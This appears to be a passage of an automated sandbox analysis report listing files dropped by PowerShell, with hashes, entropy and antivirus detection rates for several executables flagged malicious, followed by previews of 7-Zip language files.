                                                                                                                                                          SHA-512:DE6A1E62D4E33F807D9C04F355A762717EEDBCF540E747A97BA824871D4A1F144F4929141DF333711D42AF01E441DBBCECBB25A6A4F8EC073A024D94197B776B
                                                                                                                                                          Malicious:true
                                                                                                                                                          Antivirus:
                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):373656
                                                                                                                                                          Entropy (8bit):5.747099794440249
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:3072:rbT9vTZFNSlIbVf7o3Cyi7igb/Js0S6uZZspiDbZHNjWOnNxFiKey1ISQlXflY:fRvNvvbhOq7F3S/qpiDlNCONvmXdY
                                                                                                                                                          MD5:14934CACA84D5FE0288F27EFB31DCBF8
                                                                                                                                                          SHA1:98C8C659488A5782679112E0FFB089422A664AC5
                                                                                                                                                          SHA-256:7FA86147035627BAE39576BCBE619D045E94A48C4DB8CA131968C20BB4DE4A36
                                                                                                                                                          SHA-512:9A239132A46FE578FA04FF727D8C28F9E1D179E7154619670A22A403819F337AF0A96EBD7081D04D53910A12BBDC548B3CD2B2A285931C92F1C149AD5D846A6A
                                                                                                                                                          Malicious:true
                                                                                                                                                          Antivirus:
                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):57443
                                                                                                                                                          Entropy (8bit):4.727941689161333
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:768:YEGJ9blT7XZBSbHwJU+tGR0KZUyGKZ0ZgwmF1+3UVambg:YEGJ9bln5o0KZjGKZ0Z1mF1+3UVayg
                                                                                                                                                          MD5:05E61539B8917FCA37C03756BBDD043D
                                                                                                                                                          SHA1:5A72E0E528260DE0EA5B34BADB9E5F9873CB4245
                                                                                                                                                          SHA-256:515C8E0B93F0FEF15DA3E2573AD92B7E7840374140E65E5D73DF63D8E22CB3E8
                                                                                                                                                          SHA-512:565D57783E6044D6E7E2026C79DBD897E637C5E1D96E7930DC704EF2B6D801669B38F0C26382F00E67E26668439274941E937A0ADE54666DE50B5D84F6DA7E97
                                                                                                                                                          Malicious:true
                                                                                                                                                          Antivirus:
                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):32847
                                                                                                                                                          Entropy (8bit):6.251658580310083
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:384:+qtTeds1tkMAp4TxCW9su5UcSu93ggoXUQQIPGEANHl:FTedukelF95RjQUUPpANHl
                                                                                                                                                          MD5:1AEDCB8994D6AD63EF9DCB87016E028F
                                                                                                                                                          SHA1:F5B891AA15C6353B681BDB7E2D96C6AC8A5F02D7
                                                                                                                                                          SHA-256:53E1F40144BAB532F9700FF25EC3D5C6A39784A98E17FADA583B4EE6D9DD5DBC
                                                                                                                                                          SHA-512:89C0F408797C4D78AFC52335A9E162345C614E1E419F55487CB358C14F7A69EC82138A7E6250BE3133233386BA3659D241E80AB63C9B972B6C8B26B0424CB0C8
                                                                                                                                                          Malicious:true
                                                                                                                                                          Antivirus:
                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):752738
                                                                                                                                                          Entropy (8bit):6.01898968608624
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:6144:x9Ej/jb82/HRoXO1q2pt+Mc1/PDPicsUzM+gYESoE/wOuET8F62bH5vnGfcJvl+b:fqptG/PDPo0no2Iq8F6CHBTWqU
                                                                                                                                                          MD5:88962410244BC5C03482B82A7E3CB5E1
                                                                                                                                                          SHA1:4622BE2D3DEDA305BF0A16C0E01BC2ECF9D56FAD
                                                                                                                                                          SHA-256:AFA884228AFC5C05F4B47E90B6DE42854D5A8886EC5ED15A253FAECCD5309036
                                                                                                                                                          SHA-512:C6E7667F91C1439E33AD4D9E2052B7C9FCC3CA2C7688D9E2BC0550B71A5762B76AA76427331DF0217429D9BD984925997C7A8D009F25E44E2776C5CE7CC9D98C
                                                                                                                                                          Malicious:true
                                                                                                                                                          Antivirus:
                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):49251
                                                                                                                                                          Entropy (8bit):6.081875364524709
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:768:FPGeoWyuTx6vrP/zAdWQS6Z9CSKh64crVKTl9inMUAK:tGeJxIHepSKzjVK9iMUAK
                                                                                                                                                          MD5:059D94E8944ECA4056E92D60F7044F14
                                                                                                                                                          SHA1:46A491ABBBB434B6A1A2A1B1A793D24ACD1D6C4B
                                                                                                                                                          SHA-256:9FA7CACB5730FAACC2B17D735C45EE1370130D863C3366D08EC013AFE648BFA6
                                                                                                                                                          SHA-512:0F45FE8D5E80A8FABF9A1FD2A3F69B2C4EBB19F5FFDCFEC6D17670F5577D5855378023A91988E0855C4BD85C9B2CC80375C3A0ACB1D7A701AFF32E9E78347902
                                                                                                                                                          Malicious:true
                                                                                                                                                          Antivirus:
                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 79%
                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                          File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):3312264
                                                                                                                                                          Entropy (8bit):7.95615688063186
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:98304:lJXOBfK92HbAw0CNB3kJElzNsy8vGUvfCo3ABH43:lJ192HbAXCvDlzNsy8vGUyo3AB8
                                                                                                                                                          MD5:B66DEC691784F00061BC43E62030C343
                                                                                                                                                          SHA1:779D947D41EFAFC2995878E56E213411DE8FB4CF
                                                                                                                                                          SHA-256:26B40C79356453C60498772423F99384A3D24DD2D0662D215506768CB9C58370
                                                                                                                                                          SHA-512:6A89BD581BAF372F07E76A3378E6F6EB29CAC2E4981A7F0AFFB4101153407CADFCE9F1B6B28D5A003F7D4039577029B2EC6EBCFD58E55288E056614FB03F8BA3
                                                                                                                                                          Malicious:true
                                                                                                                                                          Antivirus:
                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                          File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):7885
                                                                                                                                                          Entropy (8bit):4.947119682698004
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:192:ifEAGRBQ0p/74r5jMdDTSBXgDQ7V8vBOC:iV5o74r5jMdY8l
                                                                                                                                                          MD5:BF8564B2DAD5D2506887F87AEE169A0A
                                                                                                                                                          SHA1:E2D6B4CF90B90E7E1C779DD16CBEF4C787CBD7CF
                                                                                                                                                          SHA-256:0E8DD119DFA6C6C1B3ACA993715092CDF1560947871092876D309DBC1940A14A
                                                                                                                                                          SHA-512:D3924C9397DC998577DD8CB18CC3EA37360257D4F62DD0C1D25B4D4BF817E229768E351D7BE0831C53C6C9C56593546E21FD044CF7988E762FB0A04CD2D4EC81
                                                                                                                                                          Malicious:false
                                                                                                                                                          Preview:.;!@Lang2@!UTF-8!..; : Feliciano Mart.nez Tur..; 9.07 : Juan Pablo Mart.nez..;..;..;..;..;..;..;..;..;..0..7-Zip..Aragonese..Aragon.s..401..Acceptar..Cancelar........&S...&No..&Zarrar..Aduya....&Continar..440..S. a &tot..No a t&ot..Aturar..Tornar a empecipiar..Se&gundo plano..P&rimer plano..&Pausa..Aturau..Yes seguro que quiers cancelar?..500..&Fichero..&Editar..&Veyer..&Favoritos..&Ferramientas..Ad&uya..540..&Ubrir..Ubrir &adintro..Ubrir &difuera..&Veyer..&Editar..Re&nombrar..&Copiar en.....&Mover ta.....&Borrar..Di&vidir o fichero.....C&ombinar os fichers.....&Propiedatz..Comen&tario..Calcular a suma de comprebaci.n..Diff..Creyar carpeta..Creyar fichero..&Salir..600..Seleccionar-lo &tot..Deseleccionar-lo tot..&Invertir selecci.n..Seleccionar.....Deseleccionar.....Seleccionar por tipo..Deseleccionar por tipo..700..Iconos g&rans..&Iconos chicotz..&Lista..&Detalles..730..Desordenau..Anvista plana..&2 panels..&Barras de ferramientas..Ubrir a carpeta radiz..Carpeta mai..Hi
                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                          File Type:Unicode text, UTF-8 text, with CRLF line terminators
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):12798
                                                                                                                                                          Entropy (8bit):4.3504468224966635
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:384:7+CIwRJQh3hY4+6TRxAFqpdQbCs7ZpN4QyRl3fcxMZXj4V/2QT:LJi3K4+60Fqpd8Cs7ZpNryRl3fcxMZX6
                                                                                                                                                          MD5:1C45E6A6ECB3B71A7316C466B6A77C1C
                                                                                                                                                          SHA1:04BF837911FA31FFCA8E034158714B47F6489D38
                                                                                                                                                          SHA-256:972261B53289DE2BD8A65E787A6E7CD6DEFC2B5F7E344128F2FE0492ED30CCF1
                                                                                                                                                          SHA-512:5358BB2346C9F23318492B5E7D208E37A703C70D62014426EADD2DD8CDA0B91C9D9C2A62EAFE0137FAEFB38BF727FD4D5D8DC18394784CCAE75AE9550558E193
                                                                                                                                                          Malicious:false
                                                                                                                                                          Preview:;!@Lang2@!UTF-8!..; 9.07 :............:... ..-.... ....... ..; 9.07 : Awadh A Al-Ghaamdi..;..; 15.00 : 2016-08-28 : ..... ...... .......: ... .... ........; 15.00 : 2016-08-28 : Saif H Al-asadi (edited and corrected) ..; 20.00 : 2020-04-01 : Ammar Kurd (Edits and corrections)..;..;..;..;..;..0..7-Zip..Arabic........401.............. .............&.....&....&...................&.........440..... ........ .................. ..........&...........&......&..... ........... .......... ... ..... .. ..........500..&.....&.......&.........&.......&.......&........540..&.....&.... ..........&... ........&.....&..........&.. ............&.. ........&.. .....&.....&..... ............&. ..............
                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                          File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):9625
                                                                                                                                                          Entropy (8bit):5.375676523076257
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:192:iQMqAQbtI+SY+oEDQM0ia9mh/Vg/HksiM0ko3gvje2ojVPC1vUZzxEBa2U:i7SrSYzEsMDV4P0kggv6pCahxEwr
                                                                                                                                                          MD5:81B732A8B4206FB747BFBFE524DDE192
                                                                                                                                                          SHA1:4D596B597CF25FF8D8B43708E148DB188AF18EF9
                                                                                                                                                          SHA-256:CAEC460E73BD0403C2BCDE7E773459BEA9112D1BFACBE413D4F21E51A5762BA6
                                                                                                                                                          SHA-512:8667BFF18A26FE5B892ECFDC8D9C78ECC5659B42C482E1F9E6EB09F7CF5E825584851CD4E9A00F5C62D3096D24CC9664F8223C036A4F2F6E9C568269B2FBB956
                                                                                                                                                          Malicious:false
                                                                                                                                                          Preview:.;!@Lang2@!UTF-8!..; 9.07 : F@rhad..; 15.02 : 2015-03-29 : .. .........; ..;..;..;..;..;..;..;..;..0..7-Zip..Azerbaijani..Az.rbaycanca..401..OLDU...mtina........&B.li..&Xeyr..&Ba.lamaq..K.m.k....&Davam..440..&Ham.s.na B.li..Ha&m.s.na Xeyr..Dayan..Yenid.n ba.lamaq..&Arxa planda...&nd...F&asil...Fasil.d...H.qiq.t.n .m.liyyat. dayand.rmaq ist.yirsiniz?..500..&Fayl..&D.z.li...&G.r.n....S&e.ilmi.l.r..&Vasit.l.r..&Aray....540..&A.maq..&Daxild. A.maq..B&ay.rda a.maq..&Bax....&D.z.li...Ye&nid.n Adland.rmaq..&N.sx.l.m.k.....&K...rm.k.....&Silm.k..Fayl. &B.lm.k.....Fayllar. B&irl..dirm.k.....X&.susiyy.tl.r....r&h.....Yoxlama C.mi..M.qayis...Qovluq Yaratmaq..Fayl Yaratmaq...&.x.....stinad..&.v.zedici Ax.nlar..600..&Ham.s.n. Se.m.k..Se.imin L..vi..&Se.imi .evirm.k..Se.m.k.....Se.imin L..vi.....N.v.n. G.r. Se.m.k..N.v.n. G.r. Se.imin L..vi..700..&B.y.k ..ar.l.r..K&i.ik
                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                          File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):11261
                                                                                                                                                          Entropy (8bit):4.710389021145071
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:192:ikNx8wxsv75EMVB1m6pP3z/WxdxbpXuBwBMzByzVHQnlBJ7a/NMIMx:ikLhsv75EMVB1m6pP3dzk5ww/NMIq
                                                                                                                                                          MD5:D83B65AC086DA0C94D6EB57BEE669C2B
                                                                                                                                                          SHA1:6210F62D41D44CC280F44B39ACCF10DA28424B75
                                                                                                                                                          SHA-256:2901B54F7621C95429658CB4EDB28ABD0CB5B6E257C7D9A364FC468A8B86BAAE
                                                                                                                                                          SHA-512:56C7ECB4223103D81FFD11C214CCEAC20E7770B82FBC78A5E82E6DD9D589CC319D4689BB6D9027E5D272097E1B33DDBA27A8414FCBC29F9EF68329E343004222
                                                                                                                                                          Malicious:false
                                                                                                                                                          Preview:.;!@Lang2@!UTF-8!..; 9.20 : Haqmar : www.bashqort.com..; ..;..;..;..;..;..;..;..;..;..0..7-Zip..Bashkir.............401............. ..........&.....&....&.............&.......440.......... .. .&......&...... .. ................. .......&..... .........&... ........&........ ................. .... ....... .. ...... ............?..500..&........&......&..........&............&........&.........540..&........&...... ........&..... ..........&.....&...............&...... .............&.................&............&.............. &............... ...&................&..........&................. ......Diff..... ............. &..........&.
                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                          File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):12193
                                                                                                                                                          Entropy (8bit):4.4720152705808935
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:192:i2PDEeaNB1PmcptkcDHxbTvPnc67bMxQxGx4ch/JuLQRcg/oN96bPNljYiYr197:ikDFKBFmcPLx3HPnIsqrJuqcgAN96b87
                                                                                                                                                          MD5:3C21135144AC7452E7DB66F0214F9D68
                                                                                                                                                          SHA1:B1EC0589D769EAB5E4E8F0F8C21B157EF5EBB47D
                                                                                                                                                          SHA-256:D095879B8BBC67A1C9875C5E9896942BACF730BD76155C06105544408068C59E
                                                                                                                                                          SHA-512:0446A0E2570A1F360FD8700FD4C869C7E2DBB9476BBDEC2526A53844074C79691542B91455343C50941B8A6D5E02A58EE6AA539CC4C4AE9CF000B4034EF663E2
                                                                                                                                                          Malicious:false
                                                                                                                                                          Preview:.;!@Lang2@!UTF-8!..; : Kirill Gulyakevitch..; 9.07 : 2011-03-15 : Drive DRKA..;..;..;..;..;..;..;..;..;..0..7-Zip..Belarusian..............401..OK................&.....&....&......................&............440..... ... &........ ... .&.......................&.......&.. ....... ......&......... ......... ........ ....... .......... ........?..500..&......&........&........&..........&.......&.........540..&................ &................... .&................&................&.........&......... ......&........... ......&............&..... ..........&.'...... .............&...........&................. ......Diff..&........ .
                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                          File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):13231
                                                                                                                                                          Entropy (8bit):4.264061628389684
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:384:i6jWFsfLEnlztmkbjX8jD5VqWMTlHdr8vwyFSH:tfghGufHdrLyFA
                                                                                                                                                          MD5:833AFB4F88FDB5F48245C9B65577DC19
                                                                                                                                                          SHA1:1A6E013226BE42CD2D2872B1E6E5747FAB65FE8A
                                                                                                                                                          SHA-256:4DCABCC8AB8069DB79143E4C62B6B76D2CF42666A09389EACFC35074B61779E3
                                                                                                                                                          SHA-512:05BBC7ABCFD0A0B7C3305C860B6372871CF3927BBE1790351485A315166E4CBDF8D38D63E01B677BDBA251CE52DA655F20B2D44B997D116A1794C7B3EB61EF31
                                                                                                                                                          Malicious:false
                                                                                                                                                          Preview:.;!@Lang2@!UTF-8!..; : chavv..; : icobgr..; 4.65 : Vassia Atanassova..;..;..;..;..;..;..;..;..0..7-Zip..Bulgarian.............401..OK...............&....&....&......................&............440.... .. &.......... .. &................ ........&..... .......&........ .......&........ ............... .. ....... .. ..........?..500..&......&.............&...........&........&.............&.......540..&.................. &........... &.......&...........&.................&..........&........ .........&........ ........&..........&........ .. ..........&.......... .. ............&.............&.................. .. ......... ..
                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                          File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):15062
                                                                                                                                                          Entropy (8bit):4.039346182307332
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:192:iM+g4O23sZEstg+lTr++0Mx148IiZaXTXEU10bXYc+4/rexX4:iMyc2stg+lTr++0MQ8DZRDYc+4axI
                                                                                                                                                          MD5:D0E788F64268D15B4391F052B1F4B18A
                                                                                                                                                          SHA1:2FD8E0A9DD22A729D578536D560354C944C7C93E
                                                                                                                                                          SHA-256:216CC780E371DC318C8B15B84DE8A5EC0E28F712B3109A991C8A09CDDAA2A81A
                                                                                                                                                          SHA-512:D50EA673018472C17DB44B315F4C343A2924A2EAA95C668D1160AA3830533CA37CC13C2067911A0756F1BE8C41DF45669ABE083759DCB9436F98E90CBB6AC8BF
                                                                                                                                                          Malicious:false
                                                                                                                                                          Preview:.;!@Lang2@!UTF-8!..; 4.46 : Team Oruddho (Fahad Mohammad Shaon, Mahmud Hassan) : http://www.oruddho.com..;..;..;..;..;..;..;..;..;..;..0..7-Zip..Bangla.........401..... ..................&.......&....&.... ................&...... .......440..&....... .... ........&...... .... .............. ......&........& .......&.............. ............... ..... .... ......?..500..&......&..................&..&.......&........&........540..&........ .....7-zip-. ........ ........... ........ .....&..........&............. ...
                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                          File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):9375
                                                                                                                                                          Entropy (8bit):5.027798509110858
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:192:iDNC5+TqX1VvwqqNZ3SE/ye3TmsZmpk0R6PeNJH+L/w3M0ZeDwDWBszBUe:iBhuX1OqqNZ39BDmfHB4yXBUe
                                                                                                                                                          MD5:1657720023A267B5B625DE17BF292299
                                                                                                                                                          SHA1:0045DFAFAFB9C9058F7D0D6A6C382959C5A67FE0
                                                                                                                                                          SHA-256:ED8748DA8FA99DB775FF621D3E801E2830E6C04DA42C0B701095580191A700A6
                                                                                                                                                          SHA-512:E7998F6484370E53DB9CDC80CD55070E408AA93161FA59E48C6E2B26462D6D3EB774C011212840EF1EB821A5BA067B6706CD4CA2BE00619AECD24A11E6CA136F
                                                                                                                                                          Malicious:false
                                                                                                                                                          Preview:.;!@Lang2@!UTF-8!..; 9.07 : Josep Casals, Marc Folch..;.17.01.: Benet..BennyBeat..R..i.Camps..;..;..;..;..;..;..;..;..;..0..7-Zip..Catalan..Catal...401..D'acord..Cancel.la........&S...&No..Tan&ca..Ajuda....&Continua..440..S. a &tot..No a t&ot..Atura..Re&inicia..Rere&fons..Prim&er pla..&Pausa..Pausat..Segur que voleu cancel.lar?..500..&Fitxer..&Edita..&Visualitza..&Preferits..E&ines..Aj&uda..540..&Obre..Obre d&ins..Obre &fora..&Visualitza..&Edita..Reanom&ena..&Copia a.....&Mou a.....&Suprimeix..&Divideix el fitxer.....Com&bina el fitxer.....P&ropietats..Come&ntari..Calcula la suma de verificaci...Compara..Crea una carpeta..Crea un fitxer..S&urt..Enlla&...Flux &alternatiu..600..Seleccion&a-ho tot..No seleccionis res..&Inverteix la selecci...Selecciona.....Desselecciona.....Selecciona per tipus..Desselecciona per tipus..700..Icones g&rans..Icones petites..&Llista..&Detalls..730..No ordenat..Vista plana..&2 Panells..&Barres d'eines..Obre la carpeta arrel..Carpeta pare..H
                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                          File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):10695
                                                                                                                                                          Entropy (8bit):5.020353007635267
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:192:ihVHn4OzB1duTbLH7v6Hosnk8dazlVDFdYojN4/5rA3AOEY9yt0zKdAVJg:ihtnjJuHLH76Hosk8daZV7FjN4RrA3FG
                                                                                                                                                          MD5:C76B8C615C11469D5F6DFF0ABF39171E
                                                                                                                                                          SHA1:1906CD1CE4712D79D129FCF32FD2FF87368081EA
                                                                                                                                                          SHA-256:5470B36A4A715DECA06035333A01E0A2899FCE1CF6C29A6ECE4C35CFCC843CFD
                                                                                                                                                          SHA-512:C4920988538810B9501C6790A2ED4D4E82500134244B8AE1371F3025BFFBC7E6CC73FE1A9839AA2A0D020F2B9CBF0FD09EC99354CB2A65C3D08AF519BDE38384
                                                                                                                                                          Malicious:false
                                                                                                                                                          Preview:.;!@Lang2@!UTF-8!..; 20.02.: 2020-12-04.: Patriccollu di Santa Maria . Sich. (Latest Update)..; 9.20.: 2010-12-12.: Patriccollu di Santa Maria . Sich. (Creation)..;..;..;..;..;..;..;..;..;..0..7-Zip..Corsican..Corsu..401..Vai..Abbandun.........&I...I&nn...&Chjode..Aiutu....&Cuntinu...440..I. per &tutti..Inn. per t&utti..Piant...Rilanci...Tacca di &fondu..In &primu pianu..&Pausa..In pausa..Site sicuru di vul. annull..?..500..&Schedariu..&Mudificazione..&Affissera..&Favuriti..A&ttrezzi..Ai&utu..540..&Apre..Apre den&tru..Apre f&ora..&Fighj...&Mudific...&Rinumin...&Cupi. ver di...&Dispiazz. ver di...S&quass...&Sparte u schedariu...&Unisce i schedarii...&Prupriet...Cumme&ntu...Calcul. a somma di cuntrollu..Paragun. e sfarenze..Cre. un cartulare..Cre. un schedariu..&Esce..Liame..Flussi a&lternativi..600..&Tuttu selezziun....n selezziun. &nunda..&Arritrus. a selezzione..&Selezziun.....n &micca selezziun....Selezziun. da u tipu...n selez
                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                          File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):9204
                                                                                                                                                          Entropy (8bit):5.371514089173945
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:192:iRJ98lWxEb5BvGIrd+mc1OTno+SXhbSIm1JjSvcQpK/w:ijK0GeIrQmEOTno+SXox1JjmpKo
                                                                                                                                                          MD5:641B90F9AEDFC68486D0D20B40F7ECA6
                                                                                                                                                          SHA1:0A683DD844534905336784FADD80498AFE26F6FA
                                                                                                                                                          SHA-256:87A4B9369FD51D76C9032C0E65C3C6221659E086798829072785BE589E55B839
                                                                                                                                                          SHA-512:567CB9F6C31D196A171E5A9C2726A39A9B3D351AC92D4ACF8624213A68C9033ACC31AFAAAD82AA9F5359F32D3A0CA40522E151B8370D553A41ABEB6A6E097078
                                                                                                                                                          Malicious:false
                                                                                                                                                          Preview:.;!@Lang2@!UTF-8!..; 4.30 : Milan Hrub...; 4.33 : Michal Molhanec..; 9.07 : Ji.. Mal.k..; 15.00 : Kry.tof .ern...;..;..;..;..;..;..;..0..7-Zip..Czech...e.tina..401..OK..Storno........&Ano..&Ne..Zav..&t..N.pov.da....Po&kra.ovat..440..Ano na &v.echno..N&e na v.echno..Zastavit..Spustit znovu..&Pozad...P&op.ed...Po&zastavit..Pozastaveno..Jste si jist., .e to chcete stornovat?..500..&Soubor...pr&avy..&Zobrazen...&Obl.ben...&N.stroje..N.po&v.da..540..&Otev..t..Otev..t u&vnit...Otev..t &mimo..&Zobrazit..&Upravit..&P.ejmenovat..Kop.rovat &do.....P.&esunout do.....Vymaza&t..&Rozd.lit soubor.....&Slou.it soubory.....Vlast&nosti..Pozn.mk&a..Vypo..tat kontroln. sou.et..Porovnat soubory..Vytvo.it slo.ku..Vytvo.it soubor..&Konec..Odk.zat..&Alternate Streams..600..Vybrat &v.e..Zru.it v.b.r v.e..&Invertovat v.b.r..Vybrat.....Zru.it v.b.r.....Vybrat podle typu..Zru.it v.b.r podle typu..700..&Velk. ikony..&Mal. ikony..&Seznam..&Podrobn
                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                          File Type:Unicode text, UTF-8 text, with CRLF line terminators
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):8365
                                                                                                                                                          Entropy (8bit):5.033083436849625
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:192:7lsrCMNPOVDlCOd6NSv9MPdYJIG8YsYccAP6ox1OYSqMHCaQEzYcdD73Q5CTG:7lsrVwJCe6NzPdYJIG8YsYccuT1RSBCV
                                                                                                                                                          MD5:D8ABA2DA47C1031832957B75A6524737
                                                                                                                                                          SHA1:B83069EF9F7A08F18804AE966B8D18657E2907CD
                                                                                                                                                          SHA-256:F65026AE33D4302A7EF06A856F6F062C9730100F5A87D5C00FB3FEAF5FCD5805
                                                                                                                                                          SHA-512:82B5F4AB8E3E2310A98BE87B5CF2CBF04B7AEAE1798CD69529325EE74ADD40BDCA38EDA865A821F66436906D4F3224004F690CF406B532E116475D2B2424B570
                                                                                                                                                          Malicious:false
                                                                                                                                                          Preview:;!@Lang2@!UTF-8!..; : Jakob Schmidt..; 9.07 : Kian Andersen, J.rgen Rasmussen..; 15.00 : 2016-11-25 : scootergrisen..;..;..;..;..;..;..;..;..0..7-Zip..Danish..Dansk..401..OK..Annuller........&Ja..&Nej..&Luk..Hj.lp....&Forts.t..440..Ja til &alle..Nej til a&lle..Stop..Genstart..&Baggrund..&Forgrund..&Pause..Sat p. pause..Er du sikker p., at du vil annullere?..500..&Filer..R&ediger..&Vis..F&avoritter..Funk&tioner..&Hj.lp..540..&.bn...bn &inden i...bn &uden for..&Vis..&Rediger..O&md.b..&Kopier til.....&Flyt til.....S&let..&Opdel fil.....Kom&biner filer.....&Egenskaber..Komme&ntar.....Udregn checksum..Sammenlign..Opret mappe..Opret fil..&Afslut..Opret/rediger henvisning..&Alternative str.mme..600..V.lg &alle..Frav.lg alle..&Omvendt markering..V.lg.....Frav.lg.....V.lg efter type..Frav.lg efter type..700..Sto&re ikoner..S&m. ikoner..&Liste..&Detaljer..730..Usorteret..Flad visning..&2 paneler..&V.rkt.jslinjer...bn rodmappe..Et niveau op..Mappehistorik.....&Opdater.
                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                          File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):9638
                                                                                                                                                          Entropy (8bit):5.0781244819805496
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:192:ifuT0Y83ghfM/5yT9lBJ/LQs6gIgiOvcLh3ahAHE+XAgiRTlu6ZgSboZDWUL+g9C:iG0D3ghcy7Ms6gIgiOktU+Iu6CS4L+g0
                                                                                                                                                          MD5:40AE22F5BCBEAB6F622771562D584F2B
                                                                                                                                                          SHA1:4EAA551055CCFA0076766B7BDF111DE9DBCC1C82
                                                                                                                                                          SHA-256:06E5265A2B30807296480DC0B0D3A27E41F1381D61229E4EB239C4930D14A43E
                                                                                                                                                          SHA-512:581A94DC12FE48AEBFD88453351697AED9DE5B1DECF4C5DD53CF4DB38D50727D3B887498F0BEE6BD532CFBDC8AF7BC01FC8D58CE0C3F6FAC235BC6FF3F843125
                                                                                                                                                          Malicious:false
